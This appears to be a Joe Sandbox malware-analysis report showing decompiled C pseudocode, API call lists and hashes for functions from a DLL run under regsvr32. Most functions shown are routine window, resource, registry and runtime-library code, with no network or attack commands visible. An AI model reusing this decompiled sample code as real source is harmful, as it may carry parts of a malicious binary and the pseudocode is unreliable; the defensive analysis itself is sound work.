0x6da4caeb
0x6da4caf2
0x6da4caf2
0x6da4cb09
0x6da4cb12
0x6da4cb18
0x6da4cb1b
0x6da4cb1f
0x6da4cb27
0x6da4cb27
0x6da4cb34
0x6da4cb34
0x6da4cb3c
0x6da4cb42
0x6da4cb4a

APIs

Part of subcall function 6DA3D6AF: _malloc.LIBCMT ref: 6DA3D6CD

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6DA4CB09
GetCurrentProcess.KERNEL32(?,00000000), ref: 6DA4CB0F
DuplicateHandle.KERNEL32 ref: 6DA4CB12
GetLastError.KERNEL32(?), ref: 6DA4CB2D

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: dd5cf65cdb295e4e23cdba4373747035eb2ecc0216f39bb862fce91e4d72ddd3
Instruction ID: 3278744160cf9f7595af3dce86160dcdb2fab211b1240d9311652b2e8fa6e490
Opcode Fuzzy Hash: dd5cf65cdb295e4e23cdba4373747035eb2ecc0216f39bb862fce91e4d72ddd3
Instruction Fuzzy Hash: 4001D476708301ABDB009B6ACD48F5A7BB9EF85750F19C425FA08CB281EB71DC41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6DA44CB5 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6DA44CB5(void* __ebx, void* __ecx, void* __edx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				void* __edi;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t19;
				void* _t20;
				struct HWND__* _t22;
				struct HWND__* _t23;
				struct HWND__* _t26;

				_t20 = __edx;
				_t8 = _a8;
				_v12.x = _t8->x;
				_t19 = _t8->y;
				_push(_t19);
				_v12.y = _t19;
				_t9 = WindowFromPoint( *_t8);
				_t26 = _t9;
				if(_t26 != 0) {
					_t22 = GetParent(_t26);
					if(_t22 == 0 || E6DA49D6F(__ebx, _t20, _t22, _t22, 2) == 0) {
						ScreenToClient(_t26,  &_v12);
						_t23 = E6DA49E15(_t26, _v12.x, _v12.y);
						if(_t23 == 0) {
							L6:
							_t9 = _t26;
						} else {
							_t14 = IsWindowEnabled(_t23);
							_t9 = _t23;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t22;
					}
				}
				return _t9;
			}

0x6da44cb5
0x6da44cbc
0x6da44cc2
0x6da44cc5
0x6da44cc8
0x6da44ccb
0x6da44cce
0x6da44cd4
0x6da44cd8
0x6da44ce2
0x6da44ce6
0x6da44cfd
0x6da44d0f
0x6da44d13
0x6da44d22
0x6da44d22
0x6da44d15
0x6da44d16
0x6da44d1e
0x6da44d20
0x00000000
0x00000000
0x6da44d20
0x6da44cf4
0x6da44cf4
0x6da44cf4
0x6da44d24
0x6da44d27

APIs

WindowFromPoint.USER32 ref: 6DA44CCE
GetParent.USER32(00000000), ref: 6DA44CDC
ScreenToClient.USER32(00000000,?), ref: 6DA44CFD
IsWindowEnabled.USER32(00000000), ref: 6DA44D16

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Window$ClientEnabledFromParentPointScreen
String ID:
API String ID: 1871804413-0
Opcode ID: 1df7f7c92762c27f6cb9ea4d173888c7b8940800d435e8c1519c0f19c1865baa
Instruction ID: 57f5170b001f9a25bc53fc2c2d2c822b3b76ccb6b308c28f3f63cab5ae0e2260
Opcode Fuzzy Hash: 1df7f7c92762c27f6cb9ea4d173888c7b8940800d435e8c1519c0f19c1865baa
Instruction Fuzzy Hash: 5501843A608A15BFCB128F59C909EAE7ABDEF8E701B15C018F915D7200EBB5CA418764

Uniqueness

Uniqueness Score: -1.00%

Function 6DA40F7C Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6DA40F7C(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E6DA4061E(_t22, _t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E6DA40C91(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E6DA40F7C(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}

0x6da40f7c
0x6da40f7c
0x6da40f86
0x6da40f8c
0x6da40fef
0x6da40fef
0x6da40ff3
0x00000000
0x00000000
0x6da40f90
0x6da40f94
0x6da40fbe
0x6da40f96
0x6da40f97
0x6da40f9c
0x6da40f9e
0x6da40fa0
0x6da40fa3
0x6da40fa6
0x6da40fa9
0x6da40fac
0x6da40fad
0x6da40fad
0x6da40f9e
0x6da40fc4
0x6da40fc8
0x6da40fcb
0x6da40fcd
0x6da40fcf
0x6da40fe1
0x6da40fe1
0x6da40fcf
0x6da40fe9
0x6da40fe9
0x6da40ff8

APIs

GetTopWindow.USER32(00000000), ref: 6DA40F8C
GetTopWindow.USER32(00000000), ref: 6DA40FCB
GetWindow.USER32(00000000,00000002), ref: 6DA40FE9

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 0eafc7145468f43cf8c4838d053341e089f7b942c8a86b4bda968ea3dd07ac7f
Instruction ID: f75156c8c99c25798a415a57be33ab177e6b580413330a09f8ef7570d8660246
Opcode Fuzzy Hash: 0eafc7145468f43cf8c4838d053341e089f7b942c8a86b4bda968ea3dd07ac7f
Instruction Fuzzy Hash: 1301173600E21ABBCF125F968D05E9F3B2AAF5A394F058020FA1055060C736D5A2EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6DA408F8 Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6DA408F8(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E6DA408F8(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E6DA405F2(_t13, _t14);
						}
						_t10 = E6DA4061E(_t13, _t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E6DA408F8(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

0x6da408f8
0x6da408f8
0x6da40905
0x6da4090b
0x6da40911
0x6da40915
0x6da40945
0x6da40948
0x6da40965
0x6da40965
0x6da40967
0x6da40969
0x00000000
0x00000000
0x6da40953
0x6da40958
0x6da4095a
0x6da4095f
0x00000000
0x6da4095f
0x00000000
0x6da4095a
0x6da40917
0x6da4091c
0x6da4092e
0x6da40932
0x6da40933
0x00000000
0x6da40935
0x6da4093c
0x6da40941
0x6da40943
0x00000000
0x00000000
0x6da4091e
0x6da40925
0x6da4092c
0x00000000
0x00000000
0x6da4092c
0x6da4091c
0x6da4096e
0x6da4096e

APIs

GetDlgItem.USER32(?,?), ref: 6DA40905
GetTopWindow.USER32(00000000), ref: 6DA40918

Part of subcall function 6DA408F8: GetWindow.USER32(00000000,00000002), ref: 6DA4095F

GetTopWindow.USER32(?), ref: 6DA40948

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 4d3959c6a824df98d767937f880127fb8f921b4943ce15076369fa5534f753f6
Instruction ID: c6cffa0d1b170562750ffed1991ee6e5e437408d23e1a425983c31dfd91573f3
Opcode Fuzzy Hash: 4d3959c6a824df98d767937f880127fb8f921b4943ce15076369fa5534f753f6
Instruction Fuzzy Hash: F801843A14CB2AA7EB121E638D04E9F3A35EF66760F05C410FD2465111E731C5D2A6DD

Uniqueness

Uniqueness Score: -1.00%

Function 6DA60632 Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6DA60632(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E6DA5FF23(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E6DA60013(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E6DA60538(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E6DA6047D(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x6da60637
0x6da6063d
0x6da606b0
0x00000000
0x6da60644
0x6da60644
0x6da60647
0x6da60662
0x6da60665
0x6da60685
0x6da60697
0x6da60667
0x6da60667
0x6da6066a
0x00000000
0x6da6066c
0x6da6067e
0x6da6067e
0x6da6066a
0x6da606b5
0x6da606b9
0x6da60649
0x6da60661
0x6da60661
0x6da60647

APIs

__cftof_l.LIBCMT ref: 6DA60658

Part of subcall function 6DA6047D: __fltout2.LIBCMT ref: 6DA604A9

__cftog_l.LIBCMT ref: 6DA6067E
__cftoe_l.LIBCMT ref: 6DA606B0

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 574ca07656bfcb2d7b4c354e9fbe600ea4f9211ab515a71e5578834bb36207a6
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: FE117E7A04818AFBCF124F85CC02DEE3F22BB49358B498415FB2858030D776C5F1ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4B2E5 Relevance: 6.0, APIs: 4, Instructions: 49
memoryCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E6DA4B2E5(void* __ecx, short* _a4) {
				int _v8;
				int _v12;
				void* __ebp;
				int _t9;
				char* _t10;
				char* _t12;
				void* _t14;
				char* _t15;
				void* _t18;

				_t17 = __ecx;
				_push(__ecx);
				_push(__ecx);
				if(_a4 != 0) {
					__imp__#7(_a4, _t18, _t14);
					_v12 = _t9;
					_t10 = WideCharToMultiByte(0, 0, _a4, _t9, 0, 0, 0, 0);
					_v8 = _t10;
					__imp__#150(0, _t10);
					_t15 = _t10;
					if(_t15 == 0) {
						E6DA44860(_t17);
					}
					WideCharToMultiByte(0, 0, _a4, _v12, _t15, _v8, 0, 0);
					_t12 = _t15;
				} else {
					_t12 = 0;
				}
				return _t12;
			}

0x6da4b2e5
0x6da4b2ea
0x6da4b2eb
0x6da4b2f2
0x6da4b2fd
0x6da4b311
0x6da4b316
0x6da4b31a
0x6da4b31d
0x6da4b323
0x6da4b327
0x6da4b329
0x6da4b329
0x6da4b33c
0x6da4b33f
0x6da4b2f4
0x6da4b2f4
0x6da4b2f4
0x6da4b344

APIs

SysStringLen.OLEAUT32(00000000), ref: 6DA4B2FD
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,6DA572C3,?,00000018,6DA57601,?,?,?), ref: 6DA4B316
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 6DA4B31D
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,6DA572C3,?,00000018,6DA57601,?,?,?), ref: 6DA4B33C

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: 6f12f20149a1f72fe974b258ffd32a71316a9f68d3b8e136f556238ceeeec662
Instruction ID: 7aaf67f8b42b54a621a1f75979b1eda4008577be9d21113b316b9e9d66f87cc7
Opcode Fuzzy Hash: 6f12f20149a1f72fe974b258ffd32a71316a9f68d3b8e136f556238ceeeec662
Instruction Fuzzy Hash: AAF0317A50A238BF9B225BA78C48CEFBE7DEF873E0B108125F90491110D6715A41DAF4

Uniqueness

Uniqueness Score: -1.00%

Function 6DA433E7 Relevance: 6.0, APIs: 4, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6DA433E7(intOrPtr __ecx, CHAR* _a4) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				struct HRSRC__* _t10;
				void* _t13;
				void* _t18;
				void* _t20;
				void* _t21;
				struct HINSTANCE__* _t23;

				_push(__ecx);
				_push(_t20);
				_t13 = 0;
				_t18 = 0;
				_v8 = __ecx;
				_t24 = _a4;
				if(_a4 == 0) {
					L4:
					_t21 = E6DA42F61(_t13, _v8, _t18, _t18);
					if(_t18 != 0 && _t13 != 0) {
						FreeResource(_t13);
					}
					_t7 = _t21;
				} else {
					_t23 =  *(E6DA4984E(0, 0, _t20, _t24) + 0xc);
					_t10 = FindResourceA(_t23, _a4, 0xf0);
					if(_t10 == 0) {
						goto L4;
					} else {
						_t7 = LoadResource(_t23, _t10);
						_t13 = _t7;
						if(_t13 != 0) {
							_t18 = LockResource(_t13);
							goto L4;
						}
					}
				}
				return _t7;
			}

0x6da433ec
0x6da433ee
0x6da433f0
0x6da433f2
0x6da433f4
0x6da433f7
0x6da433fa
0x6da4342e
0x6da43437
0x6da4343b
0x6da43442
0x6da43442
0x6da43448
0x6da433fc
0x6da43401
0x6da4340d
0x6da43415
0x00000000
0x6da43417
0x6da43419
0x6da4341f
0x6da43423
0x6da4342c
0x00000000
0x6da4342c
0x6da43423
0x6da43415
0x6da4344e

APIs

FindResourceA.KERNEL32 ref: 6DA4340D
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,6DA47A9D,?,?,6DA3CE00,616B45BB), ref: 6DA43419
LockResource.KERNEL32(00000000,?,?,?,?,?,6DA47A9D,?,?,6DA3CE00,616B45BB), ref: 6DA43426
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,6DA47A9D,?,?,6DA3CE00,616B45BB), ref: 6DA43442

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 5b2ee116e3e5b254aa96116399354a77625134f75d31808279035e8af572f5e0
Instruction ID: ae553d752ccfec6312f82ad2f0f0b7fd6d576225d766f96189623af417388d32
Opcode Fuzzy Hash: 5b2ee116e3e5b254aa96116399354a77625134f75d31808279035e8af572f5e0
Instruction Fuzzy Hash: 51F0CD3F2483127BDB015FA68D849AB777CDF96663B15C038BB15D3100DF71C94186A5

Uniqueness

Uniqueness Score: -1.00%

Function 6DA22A80 Relevance: 6.0, APIs: 4, Instructions: 42
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E6DA22A80(void* _a4, char* _a8, CHAR* _a12) {
				void* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				char _v284;
				signed int _t16;
				intOrPtr _t27;
				intOrPtr _t35;
				intOrPtr _t36;
				signed int _t37;

				_t16 =  *0x6da82744; // 0x616b45bb
				_v20 = _t16 ^ _t37;
				_t33 = _a4;
				_v12 = RegOpenKeyExA(_a4, _a8, 0, 1,  &_v8);
				if(_v12 == 0) {
					_v16 = 0x104;
					RegQueryValueA(_v8, 0,  &_v284,  &_v16);
					lstrcpyA(_a12,  &_v284);
					_t33 = _v8;
					RegCloseKey(_v8);
				}
				return E6DA59DE2(_v12, _t27, _v20 ^ _t37, _t33, _t35, _t36);
			}

0x6da22a89
0x6da22a90
0x6da22a9f
0x6da22aa9
0x6da22ab0
0x6da22ab2
0x6da22aca
0x6da22adb
0x6da22ae1
0x6da22ae5
0x6da22ae5
0x6da22afb

APIs

RegOpenKeyExA.ADVAPI32(?,80000000,00000000,00000001,?), ref: 6DA22AA3
RegQueryValueA.ADVAPI32(?,00000000,?,00000104), ref: 6DA22ACA
lstrcpyA.KERNEL32(6DA22D65,?), ref: 6DA22ADB
RegCloseKey.ADVAPI32(?), ref: 6DA22AE5

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CloseOpenQueryValuelstrcpy
String ID:
API String ID: 534897748-0
Opcode ID: 320500bdeb92340b353aff502d8d2fb4d012be33720e1c201d7b13083f58254b
Instruction ID: faecb646044513039d6094d71f13577a920e0c9854dc04d754b63a400a7df5ec
Opcode Fuzzy Hash: 320500bdeb92340b353aff502d8d2fb4d012be33720e1c201d7b13083f58254b
Instruction Fuzzy Hash: 80014C7990420CEFCB14DFA0C885FEE77B8BB49300F008599E60597240DB71AA46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6DA47EE8 Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DA47EE8() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E6DA436BD(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E6DA47936(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E6DA5C8E5(_t16);
			}

0x6da47ee8
0x6da47eeb
0x6da47ef3
0x6da47ef9
0x6da47ef9
0x6da47f01
0x6da47f08
0x6da47f08
0x6da47f11
0x6da47f13
0x6da47f19
0x6da47f1c
0x6da47f21
0x6da47f21
0x6da47f1c
0x6da47f2b
0x6da47f30
0x6da47f38
0x6da47f3d
0x6da47f3d
0x6da47f43
0x6da47f4b

APIs

EnableWindow.USER32(?,00000001), ref: 6DA47F08
GetActiveWindow.USER32 ref: 6DA47F13
SetActiveWindow.USER32(?), ref: 6DA47F21
FreeResource.KERNEL32(?,?,00000024,6DA25FA4,00000000,616B45BB), ref: 6DA47F3D

Part of subcall function 6DA436BD: EnableWindow.USER32(?,6DA25FA4), ref: 6DA436CE

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: ad0365826cb38b004c0b77f77f0601491129d73ee280660daa9d8f02b7e0a235
Instruction ID: 194e53d81ede763e0f6fe7fe35a480e117fd9bf1e1bdeeb6ee35ea04e6a57b88
Opcode Fuzzy Hash: ad0365826cb38b004c0b77f77f0601491129d73ee280660daa9d8f02b7e0a235
Instruction Fuzzy Hash: D7F04F38D08B59CBCF119F64C9445BDB7B2BF49702F208164E252B2254CB369DC1CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 6DA633A3 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6DA633A3(void* __ebx, signed char __ecx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t15;
				signed char _t25;
				void* _t27;
				intOrPtr _t30;
				void* _t31;
				void* _t32;

				_t32 = __eflags;
				_t28 = __edi;
				_t27 = __edx;
				_t25 = __ecx;
				_t24 = __ebx;
				_push(0xc);
				_push(0x6da7ecd8);
				E6DA5C918(__ebx, __edi, __esi);
				_t30 = E6DA5F6C8(__ebx, __edx, __edi, _t32);
				_t15 =  *0x6da82ed4; // 0xfffffffe
				if(( *(_t30 + 0x70) & _t15) == 0) {
					L7:
					E6DA641AD(_t24, 0xc);
					_pop(_t25);
					 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
					_t10 = _t30 + 0x6c; // 0x6c
					_t28 =  *0x6da82fb8; // 0x6da82ee0
					 *((intOrPtr*)(_t31 - 0x1c)) = E6DA63365(_t10, _t28);
					 *(_t31 - 4) = 0xfffffffe;
					E6DA6340D();
				} else {
					_t34 =  *((intOrPtr*)(_t30 + 0x6c));
					if( *((intOrPtr*)(_t30 + 0x6c)) == 0) {
						goto L7;
					} else {
						_t30 =  *((intOrPtr*)(E6DA5F6C8(__ebx, __edx, __edi, _t34) + 0x6c));
					}
				}
				if (_t30 != 0) goto L6;
				 *(_t27 + 0x20) =  *(_t27 + 0x20) | _t25;
			}

0x6da633a3
0x6da633a3
0x6da633a3
0x6da633a3
0x6da633a3
0x6da633a3
0x6da633a5
0x6da633aa
0x6da633b4
0x6da633b6
0x6da633be
0x6da633e2
0x6da633e4
0x6da633e9
0x6da633ea
0x6da633ee
0x6da633f1
0x6da633fc
0x6da633ff
0x6da63406
0x6da633c0
0x6da633c0
0x6da633c4
0x00000000
0x6da633c6
0x6da633cb
0x6da633cb
0x6da633c4
0x6da633d0
0x6da633d1

APIs

__getptd.LIBCMT ref: 6DA633AF

Part of subcall function 6DA5F6C8: __getptd_noexit.LIBCMT ref: 6DA5F6CB
Part of subcall function 6DA5F6C8: __amsg_exit.LIBCMT ref: 6DA5F6D8

__getptd.LIBCMT ref: 6DA633C6
__amsg_exit.LIBCMT ref: 6DA633D4
__lock.LIBCMT ref: 6DA633E4

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
